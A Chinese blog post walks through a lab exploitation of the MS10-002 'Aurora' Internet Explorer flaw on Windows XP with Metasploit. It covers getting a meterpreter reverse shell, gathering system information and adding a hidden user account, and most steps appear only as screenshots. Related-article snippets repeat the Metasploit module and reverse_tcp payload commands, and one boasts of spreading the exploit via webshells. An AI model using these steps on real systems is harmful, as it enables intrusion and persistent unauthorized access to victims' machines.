基于XP系统IE极光漏洞渗透

最新推荐文章于 2022-03-12 21:23:42 发布
最新推荐文章于 2022-03-12 21:23:42 发布
阅读量598 收藏 2
点赞数
分类专栏: metasploit kali 文章标签: msf渗透 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lorezon/article/details/103469507
版权

极光漏洞(Aurora)是一个针对IE浏览器的重大漏洞,攻击者向目标发送链接,当IE用户使用IE浏览器点击链接时,就会向攻击者反弹一个可利用的shell,同时会严重占用目标机器的CPU,导致机器卡死。那么话不多说,直接开搞。
首先,在msf搜索10_002
在这里插入图片描述
然后调用
在这里插入图片描述
然后设置payload
在这里插入图片描述
之后show options,设置选项
在这里插入图片描述
设置好了之后启动
在这里插入图片描述
已经启动成功,接下来就想办法让目标靶机用IE浏览器打开这个IP地址,由于是测试,所以我们直接用XP打开,再返回msf,可以看到
在这里插入图片描述
有一个session已经打开了,再看XP
在这里插入图片描述
一片空白,而且无法操作了,卡死在这里
回到msf
在这里插入图片描述
sessions查看当前可用,有一个,那就用!
在这里插入图片描述
Bingo!成功得到一个meterpreter,之后就可以在目标上搞事情了。
在这里插入图片描述
shell 弹回了一个我们很熟悉的cmd
在这里插入图片描述
ipconfig就可以看到目标的IP地址
在这里插入图片描述
systeminfo就可以看到目标的详细信息
在这里插入图片描述
当然,还有目标计算机上所有用户,由于XP是以管理员用户登陆的,所以这里直接拿到了管理员权限,如果是普通用户那么还需要提权。
在这里插入图片描述
给它添加一个用户
在这里插入图片描述
进入根目录查看有什么感兴趣的东西。
我们关闭掉连接
回到XP
在这里插入图片描述
登陆界面就多出来一个用户,就是我们刚才新建的,当然,实际中肯定会想办法隐藏它。

Sure_lis
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 对 IE 浏览器极光漏洞进行渗透利用
Epsilon
03-02 5007
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux下利用 metasploit 渗透msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
ms10-002“极光漏洞漏洞复现
Ch_an_ger的博客
01-08 1459
1.漏洞原理 针对Internet Explorer“极光”内存损坏的攻击也就是IE浏览器漏洞,因此该漏洞应当不会受操作系统版本的影响; 2.准备阶段 攻击机:kali(192.168.123.21) 靶机:Windowsxp(192.168.123.55) 3.漏洞利用步骤 1)使用通过该漏洞的exp生成一个钓鱼链接,链接的监听机我暂且就设置成攻击机kali,监听端口是6666; 2)在winXP访问刚刚生成的钓鱼链接,这时XP会与监听机建立TCP连接,发送httpget请求,url地址服务器回复http
极光行动漏洞分析
w_g3366的博客
09-04 2713
极光行动 流量分析 流量包记录不多,共39条记录,两组会话 流量包不是很多,可以直接使用流追踪分析: 会话一分析: //发起请求 GET /info HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en...
CVE-2010-0249 极光
weixin_30598225的博客
09-03 209
传说中的极光漏洞 Microsoft Internet Explorer非法事件操作内存破坏漏洞 Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。Microsoft Internet Explorer在处理非法的事件操作时存在内存破坏漏洞。由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可...
ms10_002(极光漏洞渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2092
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
MS10_002漏洞复现
m0_48907714的博客
03-09 2806
MS10_002漏洞复现 漏洞介绍:ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制权。 00x01 两台虚拟机,一台为kali ip:192.168.72.4 一台为 Windows xp sp3 英文版 ip:192.168.72.6 使用的工具:msfconsole 00x02 打开两台虚拟机,打开kalimsf软件,搜索MS10_002漏洞,找到两个模块 本次复现漏洞为第一个模块exploit/windows/browser/ms10_00
XP系统安装IE8浏览器
04-12
XP系统安装IE8浏览器
windows xp系统system文件
11-12
windows/system32/config/system文件丢失或损坏,当windows xp系统system文件损坏或丢失,造成我们无法正常启动windows xp系统,我们可以用PE进入系统,把文件放到对应的位置windows/system32/config/system,再重新...
基于STWD100xP WTD嵌入式系统抗EMC技术
01-19
 嵌入式系统EMC(Electro Magnetic Compatibility)即嵌入式系统电磁兼容性,指嵌入式系统在复杂电磁环境中抵抗其他系统所产生的电磁干扰同时本身产生的电磁干扰又不影响其他系统正常工作。EMC包括EMI(Electro ...
WindowS XP IE8 离线安装包
08-01
对于“WindowS XP IE8 离线安装包”中的文件“IE8-WindowsXP-x86-CHS.2728888507.exe”,这是一个专门针对Windows XP系统,并且集成了简体中文语言的IE8安装程序。这个文件的命名方式通常包含了版本信息、操作系统...
解决vue项目xp系统下的兼容性
最新发布
06-20
然而,XP系统由于其较旧的内核和不完全支持现代浏览器特性,可能会对基于Vue.js构建的应用程序造成兼容性困扰。主要的问题可能包括: 1. **JavaScript版本支持**:XP系统默认搭载的是Internet Explorer 8,它只支持...
极光漏洞扫描器安装配置
12-01
绿盟漏洞扫描极光配置 一 设备硬件 二 设备快速配置 三 漏洞扫描 四 常用工具
极光漏洞源代码
03-03
极光漏洞源代码
metasploit对IE浏览器极光漏洞进行渗透利用
天元喜羊羊的博客
05-12 4859
msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > show op
利用XP ie浏览器漏洞获取shell
weixin_44195546的博客
03-12 3387
实验环境:kali linux、windows XP Professional SP3. 实验工具:metasploit framework 功能实现模块:use exploit/windows/brower/ms14_064_ole_code_execution 实验过程: 1.执行模块,查看参数配置,并且设置payload(set payload windows/meterpreter/reverse_tcp): 2.其他参数无需再配置,直接run就行。(如果端口LPORT被占用了,可以用
极光 0day漏洞
weixin_34198762的博客
07-05 541
不知道是不是国内首发.17号在ST核心群拿到的,18号在虚拟机2003SERVER ie7 测试成功。不过免杀做的不好一样被杀。趁国内没有大规模更新补丁之前,在webshell上大肆放马,命中率还是挺高的。下面是生成后的页面代码,其他文件就不发了.大家有兴趣可以看下---------------------------------------------------生成器代码...
Beef加载msf插件---metasploit对IE浏览器极光漏洞进行渗透利用
wkend的博客
03-22 1577
1.配置文件的修改 输入下列命令,打开配置文件, 在图中所示的地方,作出如下修改 再接着输入以下命令,打开另一个配置文件 注意下图所示的三个地方,以及user和pass 接下来切换到beef主目录之下 再开一个终端,输入msfconsole,打开msf 控制台,输入下列命令 在另一个开启的终端(就是包含beef可执行文件的目录)下输入以下命...
第五次实验
weixin_33911824的博客
10-23 208
中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验五 综合渗透 学生姓名 代翔 年级 2015 区队 六 指导教师 ...
黑客入侵Windows XP的几个常用方法
fanyuna的专栏
04-15 1080
第一招、屏幕保护  在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。  提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del”的
XP系统及软件安装-V1.0.docx
11-21
XP系统及软件安装总结 XP系统及软件安装是一项重要的任务,在保证计算机正常运行和满足用户需求方面发挥着至关重要的作用。本文将对XP系统及软件安装的操作步骤和注意事项进行总结,以帮助用户顺利进行安装。 一、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值